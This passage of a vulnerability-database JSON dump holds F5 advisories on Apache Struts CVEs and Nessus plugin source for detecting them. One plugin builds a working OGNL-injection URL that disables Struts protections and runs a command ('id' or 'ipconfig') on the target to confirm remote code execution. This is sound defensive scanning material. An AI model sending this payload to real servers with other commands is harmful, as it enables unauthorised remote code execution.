Edge Gateway | None | 11.2.1 | Not vulnerable | None \nBIG-IP GTM | None | 11.4.1 - 11.6.1 \n11.2.1 | Not vulnerable | None \nBIG-IP Link Controller | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 \n11.2.1 | Not vulnerable | None \nBIG-IP PEM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 | Not vulnerable | None \nBIG-IP PSM | None | 11.4.1 | Not vulnerable | None \nBIG-IP WebAccelerator | None | 11.2.1 | Not vulnerable | None \nBIG-IP WebSafe | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1 | Not vulnerable | None \nARX | None | 6.2.0 - 6.4.0 | Not vulnerable | None \nEnterprise Manager | None | 3.1.1 | Not vulnerable | None \nBIG-IQ Cloud | None | 4.4.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ Device | None | 4.4.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ Security | None | 4.4.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ ADC | None | 4.5.0 | Not vulnerable | None \nBIG-IQ Centralized Management | None | 5.0.0 - 5.3.0 \n4.6.0 | Not vulnerable | None \nBIG-IQ Cloud and Orchestration | None | 1.0.0 | Not vulnerable | None \nF5 iWorkflow | None | 2.0.0 - 2.3.0 | Not vulnerable | None \nLineRate | None | 2.5.0 - 2.6.2 | Not vulnerable | None \nTraffix SDC | None | 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0 | Not vulnerable | None\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-09-09T01:18:00", "type": "f5", "title": "Apache Struts Freemarker Remote Code Execution vulnerability CVE-2017-12611", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12611"], "modified": "2017-11-16T00:00:00", "id": "F5:K45474286", "href": "https://support.f5.com/csp/article/K45474286", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2023-06-03T14:52:03", "description": "Apache Struts 2 before 2.3.29 and 2.5.x before 2.5.1 allow attackers to have unspecified impact via vectors related to improper action name clean up. ([CVE-2016-4436](<https://vulners.com/cve/CVE-2016-4436>))\n\nImpact\n\nThere is no impact; F5 products are not affected by this vulnerability.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-08-03T16:14:00", "type": "f5", "title": "Apache Struts 2 vulnerability CVE-2016-4436", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4436"], "modified": "2017-08-03T16:14:00", "id": "F5:K93135205", "href": "https://support.f5.com/csp/article/K93135205", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-09-24T22:36:07", "description": "\nF5 Product Development has assigned ID 552890 to this vulnerability and has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | None | 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP AAM | None | 12.0.0 \n11.4.0 - 11.6.0 | Not vulnerable | None \nBIG-IP AFM | None | 12.0.0 \n11.3.0 - 11.6.0 | Not vulnerable | None \nBIG-IP Analytics | None | 12.0.0 \n11.0.0 - 11.6.0 | Not vulnerable | None \nBIG-IP APM | None | 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP ASM | None | 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP DNS | None | 12.0.0 | Not vulnerable | None \nBIG-IP Edge Gateway | None | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP GTM | None | 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP Link Controller | None | 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP PEM | None | 12.0.0 \n11.3.0 - 11.6.0 | Not vulnerable | None \nBIG-IP PSM | None | 11.0.0 - 11.4.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP WebAccelerator | None | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP WOM | None | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nARX | None | 6.0.0 - 6.4.0 | Not vulnerable | None \nEnterprise Manager | None | 3.0.0 - 3.1.1 | Not vulnerable | None \nFirePass | None | 7.0.0 \n6.0.0 - 6.1.0 | Not vulnerable | None \nBIG-IQ Cloud | None | 4.0.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ Device | None | 4.2.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ Security | None | 4.0.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ ADC | None | 4.5.0 | Not vulnerable | None \nLineRate | None | 2.5.0 - 2.6.1 | Not vulnerable | None \nF5 WebSafe | None | 1.0.0 | Not vulnerable | None \nTraffix SDC | None | 4.0.0 - 4.4.0 \n3.3.2 - 3.5.1 | Not vulnerable | None\n\nNone \n\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2015-10-17T01:34:00", "type": "f5", "title": "Apache Struts 2 vulnerability CVE-2015-5169", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5169"], "modified": "2018-03-14T20:07:00", "id": "F5:K17449", "href": "https://support.f5.com/csp/article/K17449", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-08-16T04:23:25", "description": " \n\n\nApache Struts 2.0.0 through 2.3.x before 2.3.20 uses predictable <s:token/> values, which allows remote attackers to bypass the CSRF protection mechanism. ([CVE-2014-7809](<https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7809>)) \n\n\nImpact \n\n\nThere is no impact; F5 products are not affected by this vulnerability.\n", "cvss3": {}, "published": "2015-08-12T23:52:00", "type": "f5", "title": "Apache Struts vulnerability CVE-2014-7809", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7809"], "modified": "2016-01-08T23:11:00", "id": "F5:K17126", "href": "https://support.f5.com/csp/article/K17126", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2023-05-18T15:37:24", "description": "The remote web application appears to use Struts 2, a web framework that utilizes OGNL (Object-Graph Navigation Language) as an expression language. Due to a flaw in the evaluation of an OGNL expression, a remote, unauthenticated attacker can exploit this issue to execute arbitrary commands on the remote web server by sending a specially crafted HTTP request. \n\nNote this issue exists because of an incomplete fix for CVE-2013-1966. \n\nNote that this version of Struts 2 is reportedly also affected by multiple cross-site scripting (XSS) vulnerabilities as well as session access and manipulation attacks; however, Nessus has not tested for these issues. \n\nNote that this plugin will only report the first vulnerable instance of a Struts 2 application.", "cvss3": {}, "published": "2013-06-19T00:00:00", "type": "nessus", "title": "Apache Struts 2 Crafted Parameter Arbitrary OGNL Expression Remote Command Execution", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-1965", "CVE-2013-1966", "CVE-2013-2115"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_3_14_2_COMMAND_EXECUTION.NASL", "href": "https://www.tenable.com/plugins/nessus/66935", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(66935);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2013-1965\", \"CVE-2013-1966\", \"CVE-2013-2115\");\n script_bugtraq_id(60082, 60166, 60167);\n script_xref(name:\"EDB-ID\", value:\"25980\");\n\n script_name(english:\"Apache Struts 2 Crafted Parameter Arbitrary OGNL Expression Remote Command Execution\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a web application that uses a Java\nframework that is affected by a remote command execution\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote web application appears to use Struts 2, a web framework\nthat utilizes OGNL (Object-Graph Navigation Language) as an expression\nlanguage. Due to a flaw in the evaluation of an OGNL expression, a\nremote, unauthenticated attacker can exploit this issue to execute\narbitrary commands on the remote web server by sending a specially\ncrafted HTTP request. \n\nNote this issue exists because of an incomplete fix for CVE-2013-1966. \n\nNote that this version of Struts 2 is reportedly also affected by\nmultiple cross-site scripting (XSS) vulnerabilities as well as session\naccess and manipulation attacks; however, Nessus has not tested for\nthese issues. \n\nNote that this plugin will only report the first vulnerable instance\nof a Struts 2 application.\");\n # https://communities.coverity.com/blogs/security/2013/05/29/struts2-remote-code-execution-via-ognl-injection\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?51bd9543\");\n script_set_attribute(attribute:\"see_also\", value:\"http://struts.apache.org/docs/s2-014.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 2.3.14.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-1965\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache-Struts Showcase < 2.3.14.1 RCE Linux\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts includeParams Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/05/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/05/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/06/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\", \"webmirror.nasl\", \"os_fingerprint.nasl\");\n script_require_ports(\"Services/www\", 80, 8080);\n\n exit(0);\n}\n\ninclude(\"http.inc\");\n\nport = get_http_port(default:8080);\ncgis = get_kb_list('www/' + port + '/cgi');\n\nurls = make_list();\n# To identify actions that we can test the exploit on we will look\n# for files with the .action / .jsp /.do suffix from the KB.\nif (!isnull(cgis))\n{\n foreach cgi (cgis)\n {\n match = pregmatch(pattern:\"((^.*)(/.+\\.act(ion)?)($|\\?|;))\", string:cgi);\n if (match)\n {\n urls = make_list(urls, match[0]);\n if (!thorough_tests) break;\n }\n match2 = pregmatch(pattern:\"(^.*)(/.+\\.jsp)$\", string:cgi);\n if (!isnull(match2))\n {\n urls = make_list(urls, match2[0]);\n if (!thorough_tests) break;\n }\n match3 = pregmatch(pattern:\"(^.*)(/.+\\.do)$\", string:cgi);\n if (!isnull(match3))\n {\n urls = make_list(urls, match3[0]);\n if (!thorough_tests) break;\n }\n if (cgi =~ \"struts2?(-rest)?-showcase\")\n {\n urls = make_list(urls, cgi);\n if (!thorough_tests) break;\n }\n }\n}\nif (thorough_tests)\n{\n cgi2 = get_kb_list('www/' + port + '/content/extensions/act*');\n if (!isnull(cgi2)) urls = make_list(urls, cgi2);\n\n cgi3 = get_kb_list('www/' + port + '/content/extensions/jsp');\n if (!isnull(cgi3)) urls = make_list(urls, cgi3);\n\n cgi4 = get_kb_list('www/' + port + '/content/extensions/do');\n if (!isnull(cgi4)) urls = make_list(urls, cgi4);\n}\n\n# Always check web root\nurls = make_list(urls, \"/\");\n\n# Struts is slow\ntimeout = get_read_timeout() * 2;\nif(timeout < 10)\n timeout = 10;\nhttp_set_read_timeout(timeout);\n\nurls = list_uniq(urls);\n\n# Determine which command to execute on target host\nos = get_kb_item(\"Host/OS\");\nif (os && report_paranoia < 2)\n{\n if (\"Windows\" >< os) cmd = 'ipconfig';\n else cmd = 'id';\n\n cmds = make_list(cmd);\n}\nelse cmds = make_list('id', 'ipconfig');\n\nvuln = FALSE;\n\nforeach url (urls)\n{\n foreach cmd (cmds)\n {\n vuln_url = url + \"/${%23context['xwork.MethodAccessor.denyMethod\" +\n \"Execution']=!(%23_memberAccess['allowStaticMethodAccess']=true),\" +\n \"(@java.lang.Runtime@getRuntime()).exec('\" +cmd+ \"').waitFor()}.action\";\n\n res = http_send_recv3(\n method : \"GET\",\n port : port,\n item : vuln_url,\n fetch404 : TRUE,\n exit_on_fail : TRUE\n );\n\n if (\n res[0] =~ \"404 Not Found\" &&\n res[2] =~ \"\\<b\\>message\\</b\\> \\<u\\>(.*)/(0)?\\.jsp\\</u\\>\"\n )\n {\n vuln = TRUE;\n break;\n }\n }\n # Stop after first vulnerable Struts app is found\n if (vuln) break;\n}\n\nif (!vuln) exit(0, 'No vulnerable applications were detected on the web server listening on port '+port+'.');\n\nsecurity_report_v4(\n port : port,\n severity : SECURITY_HOLE,\n generic : TRUE,\n request : make_list(build_url(qs:vuln_url, port:port)),\n output : chomp(res[2])\n);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:13:34", "description": "According to its self-reported version, the MySQL Enterprise Monitor running on the remote host is affected by multiple vulnerabilities : \n\n - A flaw exists within 'MultipartStream.java' in Apache Commons FileUpload when parsing malformed Content-Type headers. A remote attacker, using a crafted header, can exploit this to cause an infinite loop, resulting in a denial of service. (CVE-2014-0050)\n\n - Security bypass flaws exist in the ParametersInterceptor and CookieInterceptor classes, within the included Apache Struts 2 component, which are due to a failure to properly restrict access to their getClass() methods. A remote attacker, using a crafted request, can exploit these flaws to manipulate the ClassLoader, thus allowing the execution of arbitrary code or modification of the session state. Note that vulnerabilities CVE-2014-0112 and CVE-2014-0116 occurred because the patches for CVE-2014-0094 and CVE-2014-0113, respectively, were not complete fixes. (CVE-2014-0094, CVE-2014-0112, CVE-2014-0113, CVE-2014-0116)", "cvss3": {}, "published": "2015-05-08T00:00:00", "type": "nessus", "title": "MySQL Enterprise Monitor < 2.3.17 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0050", "CVE-2014-0094", "CVE-2014-0112", "CVE-2014-0113", "CVE-2014-0116"], "modified": "2021-01-19T00:00:00", "cpe": ["cpe:/a:mysql:enterprise_monitor", "cpe:/a:apache:struts", "cpe:/a:apache:tomcat"], "id": "MYSQL_ENTERPRISE_MONITOR_2_3_17.NASL", "href": "https://www.tenable.com/plugins/nessus/83293", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(83293);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\n \"CVE-2014-0050\",\n \"CVE-2014-0094\",\n \"CVE-2014-0112\",\n \"CVE-2014-0113\",\n \"CVE-2014-0116\"\n );\n script_bugtraq_id(\n 65400,\n 65999,\n 67064,\n 67081,\n 67218\n );\n script_xref(name:\"CERT\", value:\"719225\");\n script_xref(name:\"EDB-ID\", value:\"33142\");\n script_xref(name:\"EDB-ID\", value:\"31615\");\n\n script_name(english:\"MySQL Enterprise Monitor < 2.3.17 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of MySQL Enterprise Monitor.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host is affected by multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the MySQL Enterprise Monitor\nrunning on the remote host is affected by multiple vulnerabilities : \n\n - A flaw exists within 'MultipartStream.java' in Apache\n Commons FileUpload when parsing malformed Content-Type\n headers. A remote attacker, using a crafted header,\n can exploit this to cause an infinite loop, resulting\n in a denial of service. (CVE-2014-0050)\n\n - Security bypass flaws exist in the ParametersInterceptor\n and CookieInterceptor classes, within the included\n Apache Struts 2 component, which are due to a failure to\n properly restrict access to their getClass() methods. A\n remote attacker, using a crafted request, can exploit\n these flaws to manipulate the ClassLoader, thus allowing\n the execution of arbitrary code or modification of the\n session state. Note that vulnerabilities CVE-2014-0112\n and CVE-2014-0116 occurred because the patches for\n CVE-2014-0094 and CVE-2014-0113, respectively, were not\n complete fixes. (CVE-2014-0094, CVE-2014-0112,\n CVE-2014-0113, CVE-2014-0116)\");\n # https://www.oracle.com/technetwork/topics/security/cpuapr2015-2365600.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?56618dc1\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-021\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-022\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to MySQL Enterprise Monitor 2.3.17 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts ClassLoader Manipulation Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/03/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/05/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mysql:enterprise_monitor\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:tomcat\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"mysql_enterprise_monitor_web_detect.nasl\");\n script_require_keys(\"installed_sw/MySQL Enterprise Monitor\");\n script_require_ports(\"Services/www\", 18080);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\napp = \"MySQL Enterprise Monitor\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nfix = \"2.3.17\";\nport = get_http_port(default:18080);\n\ninstall = get_single_install(app_name:app, port:port, exit_if_unknown_ver:TRUE);\nversion = install['version'];\ninstall_url = build_url(port:port, qs:\"/\");\n\nif (ver_compare(ver:version, fix:fix, strict:FALSE) < 0)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' + install_url +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url, version);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:13:07", "description": "According to its self-reported version, the MySQL Enterprise Monitor running on the remote host is affected by multiple vulnerabilities :\n\n - A flaw exists within 'MultipartStream.java' in Apache Commons FileUpload when parsing malformed Content-Type headers. A remote attacker, using a crafted header, can exploit this to cause an infinite loop, resulting in a denial of service. (CVE-2014-0050)\n\n - Security bypass flaws exist in the ParametersInterceptor and CookieInterceptor classes, within the included Apache Struts 2 component, which are due to a failure to properly restrict access to their getClass() methods. A remote attacker, using a crafted request, can exploit these flaws to manipulate the ClassLoader, thus allowing the execution of arbitrary code or modification of the session state. Note that vulnerabilities CVE-2014-0112 and CVE-2014-0116 occurred because the patches for CVE-2014-0094 and CVE-2014-0113, respectively, were not complete fixes. (CVE-2014-0094, CVE-2014-0112, CVE-2014-0113, CVE-2014-0116)", "cvss3": {}, "published": "2015-05-08T00:00:00", "type": "nessus", "title": "MySQL Enterprise Monitor 3.0.x < 3.0.11 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0050", "CVE-2014-0094", "CVE-2014-0112", "CVE-2014-0113", "CVE-2014-0116"], "modified": "2021-01-19T00:00:00", "cpe": ["cpe:/a:mysql:enterprise_monitor", "cpe:/a:apache:struts", "cpe:/a:apache:tomcat"], "id": "MYSQL_ENTERPRISE_MONITOR_3_0_11.NASL", "href": "https://www.tenable.com/plugins/nessus/83295", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(83295);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\n \"CVE-2014-0050\",\n \"CVE-2014-0094\",\n \"CVE-2014-0112\",\n \"CVE-2014-0113\",\n \"CVE-2014-0116\"\n );\n script_bugtraq_id(\n 65400,\n 65999,\n 67064,\n 67081,\n 67218\n );\n script_xref(name:\"CERT\", value:\"719225\");\n script_xref(name:\"EDB-ID\", value:\"33142\");\n script_xref(name:\"EDB-ID\", value:\"31615\");\n\n script_name(english:\"MySQL Enterprise Monitor 3.0.x < 3.0.11 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of MySQL Enterprise Monitor.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host is affected by multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the MySQL Enterprise Monitor\nrunning on the remote host is affected by multiple vulnerabilities :\n\n - A flaw exists within 'MultipartStream.java' in Apache\n Commons FileUpload when parsing malformed Content-Type\n headers. A remote attacker, using a crafted header,\n can exploit this to cause an infinite loop, resulting\n in a denial of service. (CVE-2014-0050)\n\n - Security bypass flaws exist in the ParametersInterceptor\n and CookieInterceptor classes, within the included\n Apache Struts 2 component, which are due to a failure to\n properly restrict access to their getClass() methods. A\n remote attacker, using a crafted request, can exploit\n these flaws to manipulate the ClassLoader, thus allowing\n the execution of arbitrary code or modification of the\n session state. Note that vulnerabilities CVE-2014-0112\n and CVE-2014-0116 occurred because the patches for\n CVE-2014-0094 and CVE-2014-0113, respectively, were not\n complete fixes. (CVE-2014-0094, CVE-2014-0112,\n CVE-2014-0113, CVE-2014-0116)\");\n # https://www.oracle.com/technetwork/topics/security/cpuapr2015-2365600.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?56618dc1\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-021\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-022\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to MySQL Enterprise Monitor 3.0.11 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts ClassLoader Manipulation Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/03/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/05/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mysql:enterprise_monitor\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:tomcat\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"mysql_enterprise_monitor_web_detect.nasl\");\n 